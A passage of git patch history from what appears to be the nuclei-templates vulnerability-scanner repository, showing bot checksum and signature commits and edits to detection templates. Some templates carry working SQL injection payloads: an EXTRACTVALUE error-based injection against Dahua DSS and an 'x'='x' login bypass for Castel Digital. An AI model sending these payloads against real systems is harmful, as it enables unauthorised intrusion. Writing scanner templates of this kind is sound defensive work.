@@ -3170,6 +3170,7 @@ http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 +http/cves/2023/CVE-2023-45855.yaml:b4a5227dca9bd15ee6d351f393163365ffb9318d http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96 @@ -8517,7 +8518,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4950e75d142c90a986cb044a223fd568225adc38 +templates-checksum.txt:84293d553209b0481f69e794cb556fc5e4c80bd9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 38323f77bf45ccc692e1862d559bf9558845bae0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 03:58:37 +0000 Subject: [PATCH 0925/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d171f57fa8..fa8857443f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' + - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' From 998d0371c8b5ee24e812461b621c3acad4ccaa25 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 03:59:49 +0000 Subject: [PATCH 0926/1768] Auto Template Signing [Tue May 14 03:59:49 UTC 2024] :robot: --- http/cves/2023/CVE-2023-45855.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index db33f12afc..60276771a7 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100cbd700fb07947d7ab0657ac97cf57a41ceb390ba95b91f5ebd3eb5dc4ed2246b02210086b07d8dd2293a1fc75a3d80d0c9dcf34ddff95b979e4eccefddd9d1fc606ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5c529902106353fc169030cdc0a31bb43ea1be42 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 09:56:02 +0530 Subject: [PATCH 0927/1768] Create CNVD-2017-06001.yaml --- http/cnvd/2017/CNVD-2017-06001.yaml | 36 +++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cnvd/2017/CNVD-2017-06001.yaml diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml new file mode 100644 index 0000000000..af3c4d90a5 --- /dev/null +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -0,0 +1,36 @@ +id: CNVD-2017-06001 + +info: + name: Dahua DSS - SQL Injection + severity: high + author: napgh0st,ritikchaddha + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001 + metadata: + max-request: 1 + verified: true + fofa-query: app="dahua-DSS" + tags: cnvd,cnvd2017,sqli,dahua + +variables: + num: "999999999" + +http: + - method: GET + path: + - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1" + - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1" + + stop-at-first-match: true + + matchers: + - type: word + part: body + words: + - "XPATH syntax error:" + - "c8c605999f3d8352d7bb792cf3fdb25" + condition: and + + - type: status + status: + - 200 From ed191f320bdad5d94f0259cf57e152971118d267 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 04:54:16 +0000 Subject: [PATCH 0928/1768] Auto Generated New Template Addition List [Tue May 14 04:54:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c2172fbbf9..2521506a46 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cnvd/2017/CNVD-2017-06001.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml From 1a72df06967cbad5c63515f176aa1f3ce646cf1d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 04:54:22 +0000 Subject: [PATCH 0929/1768] Auto Generated Templates Checksum [Tue May 14 04:54:22 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 14b52594f4..415c73596e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -841,6 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 +http/cnvd/2017/CNVD-2017-06001.yaml:2f1e819ea2e5842a24aa1cd570f53f666298ecf3 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 @@ -3170,7 +3171,7 @@ http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 -http/cves/2023/CVE-2023-45855.yaml:b4a5227dca9bd15ee6d351f393163365ffb9318d +http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96 @@ -8518,7 +8519,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:84293d553209b0481f69e794cb556fc5e4c80bd9 +templates-checksum.txt:8fa102191bfcbb0bb2ed8e234dc7f050af89b78e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From aabdb13bfc0ed74f2abc469f9e23b1dbd8cd071e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 04:54:57 +0000 Subject: [PATCH 0930/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index fa8857443f..8fe50254e8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cnvd/2017/CNVD-2017-06001.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' From 69915742f185740588ba5f6c65a94f28ccca76f9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 10:25:58 +0530 Subject: [PATCH 0931/1768] Update CNVD-2017-06001.yaml --- http/cnvd/2017/CNVD-2017-06001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index af3c4d90a5..2ee033bd59 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -22,7 +22,7 @@ http: - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1" stop-at-first-match: true - + matchers-condition: and matchers: - type: word part: body From d9ca0fee43c5c99da3c31d4d3539db01a5972232 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 04:56:02 +0000 Subject: [PATCH 0932/1768] Auto Template Signing [Tue May 14 04:56:02 UTC 2024] :robot: --- http/cnvd/2017/CNVD-2017-06001.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index af3c4d90a5..0f89b746ca 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f1c4bc930e8656d19689d25b034f97ba7586fdf09204b452b110a8d4f7afb3230221008cb02b68d90e6958e52106e033c8edaf3f11ddd5afab88b52af8f1ac4f8f874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c0b90d9bc46539aa514c089a6db647d8af0895d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 04:58:59 +0000 Subject: [PATCH 0934/1768] Auto Generated Templates Checksum [Tue May 14 04:58:59 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 415c73596e..0456ee2a7f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -841,7 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 -http/cnvd/2017/CNVD-2017-06001.yaml:2f1e819ea2e5842a24aa1cd570f53f666298ecf3 +http/cnvd/2017/CNVD-2017-06001.yaml:ecbed63242b439b69b64a3980cb2f0a5b02f1237 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 @@ -8519,7 +8519,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8fa102191bfcbb0bb2ed8e234dc7f050af89b78e +templates-checksum.txt:f57d4d492e64f6152713dc50ad901f4c072bb779 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7fb9b5555401e212a25c5b4df04d024fc4f1bf91 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 05:00:41 +0000 Subject: [PATCH 0935/1768] Auto Template Signing [Tue May 14 05:00:41 UTC 2024] :robot: --- http/cnvd/2017/CNVD-2017-06001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index 6ee24c1408..832b701428 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f1c4bc930e8656d19689d25b034f97ba7586fdf09204b452b110a8d4f7afb3230221008cb02b68d90e6958e52106e033c8edaf3f11ddd5afab88b52af8f1ac4f8f874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f5a8fcc9763816b31932f9fb91cb94cdc2eb8fe9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 05:04:54 +0000 Subject: [PATCH 0937/1768] Auto Generated Templates Checksum [Tue May 14 05:04:54 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0456ee2a7f..4dd9ad8040 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -547,7 +547,7 @@ file/malware/vertex-malware.yaml:dbbbe626d020ae4d7bbd344de80b6a54835ec6b5 file/malware/virusrat-malware.yaml:26139365e8bc1b4ca2b45a9490c34b19f986215e file/malware/wabot-malware.yaml:7d2630471fae89dc585a6cbd284f9bf29e6259d7 file/malware/wannacry-malware.yaml:4d955739e936b2e11fa054b66bb3bcae8b924b49 -file/malware/warp-malware.yaml:9c5955f1a0da020828e0294bcdd0ffae3ed6c6e2 +file/malware/warp-malware.yaml:7a6eca365d2cc7890bfe29d51c03e3b248372d44 file/malware/xhide-malware.yaml:1014bac698098d85b1de13cce518523719c41021 file/malware/xor-ddos-malware.yaml:f5b4f72a7b0ed38d9d6010429fe0bb69181383ce file/malware/yayih-malware.yaml:d0632e660caa87b47d08a264fd0625d587900dc8 @@ -841,7 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 -http/cnvd/2017/CNVD-2017-06001.yaml:ecbed63242b439b69b64a3980cb2f0a5b02f1237 +http/cnvd/2017/CNVD-2017-06001.yaml:5ac8e22a95722f256b2676eb6bb0dfff30ee70c9 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 @@ -8519,7 +8519,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f57d4d492e64f6152713dc50ad901f4c072bb779 +templates-checksum.txt:babc7e838e9005be6a08c999aa2eebb3e7b4d671 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 35f4476242cd6780b066e3e7c8be91d62aead6b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 05:06:21 +0000 Subject: [PATCH 0938/1768] Auto Template Signing [Tue May 14 05:06:21 UTC 2024] :robot: --- file/malware/warp-malware.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml index 117474c917..eb34685944 100644 --- a/file/malware/warp-malware.yaml +++ b/file/malware/warp-malware.yaml @@ -23,5 +23,4 @@ file: - type: binary binary: - "80382B7503C6002D80382F7503C6005F" - -# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e80f4b2dd4f9e9816231f6df6fe61c3565dece76d808a3a46eb8834f63cf0400022100a6c76dfe0cf46ebb373f0eb870535044d5b9cbb980fc1ec329159a2ca6e263e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 04dca9e213b574818336879dd95d05537bef0805 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:39:07 +0530 Subject: [PATCH 0939/1768] minor update --- http/technologies/imgproxy-detect.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml index ba654a8528..e61b94f7cc 100644 --- a/http/technologies/imgproxy-detect.yaml +++ b/http/technologies/imgproxy-detect.yaml @@ -11,6 +11,7 @@ info: metadata: verified: true max-request: 1 + shodan-query: html:"imgproxy" tags: imgproxy,tech,detect http: @@ -21,4 +22,6 @@ http: matchers: - type: dsl dsl: - - 'status_code == 200 && contains(server, "imgproxy")' + - 'status_code == 200' + - 'contains(server, "imgproxy")' + condition: and From c4012922ca3a2ebf287382335bab64659d813840 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:42:44 +0530 Subject: [PATCH 0940/1768] minor update --- http/exposed-panels/ghost-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index b565dcdc54..25714ff071 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -5,12 +5,13 @@ info: author: userdehghani severity: info description: | - beautiful, modern publishing with email newsletters and paid subscriptions built-in. + Beautiful, modern publishing with email newsletters and paid subscriptions built-in. reference: - https://ghost.org/ metadata: verified: true max-request: 1 + fofa-query: app="Ghost" tags: panel,ghost,login,detect http: @@ -18,7 +19,6 @@ http: path: - "{{BaseURL}}/ghost/#/signin" - stop-at-first-match: true matchers-condition: or matchers: - type: word From 25103ebcb2d3d382c20b57efb3e1a5023fcb026e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:45:58 +0530 Subject: [PATCH 0941/1768] minor update --- http/technologies/meilisearch-detect.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index a2b8b18d5a..e63d1994aa 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -5,13 +5,14 @@ info: author: userdehghani severity: info description: | - an open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. + An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. reference: - https://www.meilisearch.com/ metadata: verified: true max-request: 1 - tags: meilisearch,detect + fofa-query: app="meilisearch" + tags: meilisearch,detect,tech http: - method: GET @@ -22,7 +23,9 @@ http: matchers: - type: dsl dsl: - - 'status_code == 200 && contains(content_type, "application/json")' + - 'status_code == 200' + - 'contains(content_type, "application/json")' + condition: and - type: word part: body From ce3900444e99165be915aaf296285ac4cf1a49a8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:49:20 +0530 Subject: [PATCH 0942/1768] minor update --- http/exposed-panels/n8n-panel.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index 53a0fbd748..b7c335adb8 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -18,10 +18,8 @@ http: - method: GET path: - "{{BaseURL}}/signin" - - "{{BaseURL}}/favicon.ico" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word part: body @@ -29,6 +27,6 @@ http: - 'n8n.io' case-insensitive: true - - type: dsl - dsl: - - "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))" + - type: status + status: + - 200 From 00f2c8754cadaaf74b244b728e85d78175d29ae6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 10:54:40 +0530 Subject: [PATCH 0943/1768] minor update --- http/exposed-panels/pocketbase-panel.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 963b47a412..221c4349db 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -19,10 +19,8 @@ http: - method: GET path: - "{{BaseURL}}/_/#/login" - - "{{BaseURL}}/_/images/favicon/favicon.ico" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word part: body @@ -30,6 +28,6 @@ http: - '<title>PocketBase' case-insensitive: true - - type: dsl - dsl: - - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" + - type: status + status: + - 200 From 5e6f7293fa2f8293ca78d6de2cfc2f4d6d61a22c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 11:01:48 +0530 Subject: [PATCH 0944/1768] minor update --- .../{ => softether}/softether-vpn-default-login.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) rename http/default-logins/{ => softether}/softether-vpn-default-login.yaml (89%) diff --git a/http/default-logins/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml similarity index 89% rename from http/default-logins/softether-vpn-default-login.yaml rename to http/default-logins/softether/softether-vpn-default-login.yaml index ccab0eea4e..d40d1f073d 100644 --- a/http/default-logins/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -11,6 +11,7 @@ info: metadata: shodan-query: title:"SoftEther VPN Server" verified: true + max-request: 1 tags: panel,vpn,softether,default-login http: @@ -32,7 +33,9 @@ http: - type: word part: body words: - - '<title>SoftEther VPN Server HTML5 Web Administration Console (Under construction!)' + - 'Create new Virtual Hub' + - 'Toggle navigation' + condition: and - type: status status: From 8b61462712bd2820fd02c96121b9ac5b1a1813be Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 11:08:53 +0530 Subject: [PATCH 0945/1768] minor update --- .../other/castel-digital-sqli.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index c4438fae6b..222857b3da 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -1,17 +1,19 @@ id: castel-digital-sqli info: - name: Castel Digital Authentication Bypass + name: Castel Digital - Authentication Bypass author: Kazgangap severity: high - description: SQL Injection vulnerability in Castel Digital login forms. + description: | + SQL Injection vulnerability in Castel Digital login forms. reference: - https://www.casteldigital.com.br/ - https://cxsecurity.com/issue/WLB-2024050032 metadata: + verified: true + max-request: 2 google-query: "Castel Digital" - tags: sqli,webapps - + tags: sqli,auth-bypass,castel http: - raw: @@ -21,7 +23,7 @@ http: Content-Type: application/x-www-form-urlencoded username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x - + - | GET /restrito/ HTTP/1.1 Host: {{Hostname}} @@ -34,6 +36,7 @@ http: - "Banner" - "Construtoras" condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From 8fd1b94c600e0ad3af5feb58410946bb105ac503 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 12:14:52 +0530 Subject: [PATCH 0946/1768] minor update --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 04b12668ea..e0ed92d112 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -2,7 +2,7 @@ id: open-redirect info: name: Open Redirect Detection - author: princechaddha, AmirHossein Raeisi + author: princechaddha,AmirHossein Raeisi severity: medium tags: redirect,dast From 5163c4711f67223ae8bdba30aea68e1c7b4b81f6 Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Tue, 14 May 2024 10:42:50 +0330 Subject: [PATCH 0947/1768] Add imgproxy-unauth.yaml --- http/misconfiguration/imgproxy-unauth.yaml | 34 ++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/imgproxy-unauth.yaml diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml new file mode 100644 index 0000000000..6975366998 --- /dev/null +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -0,0 +1,34 @@ +id: imgproxy-unauth + +info: + name: Imgproxy Unauthorized Access + author: userdehghani + severity: high + description: | + imgproxy is a fast and secure standalone server for resizing, processing, and converting images. + remediation: set IMGPROXY_SECRET environment variable. + reference: + - https://docs.imgproxy.net/configuration/options + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + metadata: + verified: true + max-request: 1 + shodan-query: html:"imgproxy" + tags: imgproxy,unauth,misconfig + +variables: + img_url: 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/375px-Google_2015_logo.svg.png' + +http: + - method: GET + path: + - "{{BaseURL}}/_/resize:fill:10:10:0/gravity:sm/plain/{{img_url}}" + + matchers: + - type: dsl + dsl: + - 'status_code==200' + - '("386116288" == mmh3(base64_py(body)))' + condition: and \ No newline at end of file From 0d834ff64947453ef5b0dcc185026183152caf4c Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 14 May 2024 07:22:52 +0000 Subject: [PATCH 0948/1768] Update CVE-2015-2863.yaml --- http/cves/2015/CVE-2015-2863.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 3a90c56323..b0ac2537b4 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -2,7 +2,7 @@ id: CVE-2015-2863 info: name: Kaseya Virtual System Administrator - Open Redirect - author: 0x_Akoko + author: 0x_Akoko,AmirHossein Raeisi severity: medium description: | Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. @@ -39,5 +39,5 @@ http: - type: regex part: header regex: - - 